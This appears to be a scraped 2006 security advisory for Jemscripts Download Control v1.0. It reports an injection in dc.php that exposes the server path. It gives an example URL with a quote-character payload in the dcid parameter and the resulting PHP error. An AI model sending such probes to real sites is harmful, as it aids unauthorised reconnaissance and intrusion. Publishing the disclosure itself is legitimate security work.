Jemscripts Download Control v1.0

2006.05.25

Credit: luny youfucktard com

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-2553 | CVE-2006-2552

CWE: N/A

Jemscripts Download Control v1.0
Homepage:
http://www.jemscripts.co.uk
Description:
DownloadControl provides a complete download file management system that is easy to set-up and maintain and yet gives you powerful features for controlling and monitoring your site download files. You will need to have a Unix, Linux or Windows server with PHP installed. No database is required.
effected files:
dc.php
Exploit: SQL Injection of dc.php causes a full path disclosure error.
example:
http://www.example.com/dc.php?dcid=80477172'
Warning: file(datinfo36/''/module_data.dat): failed to open stream: No such file or directory in /homepages/examplesite/downloadcontrol/functions.php on line 130

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Jemscripts Download Control v1.0

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.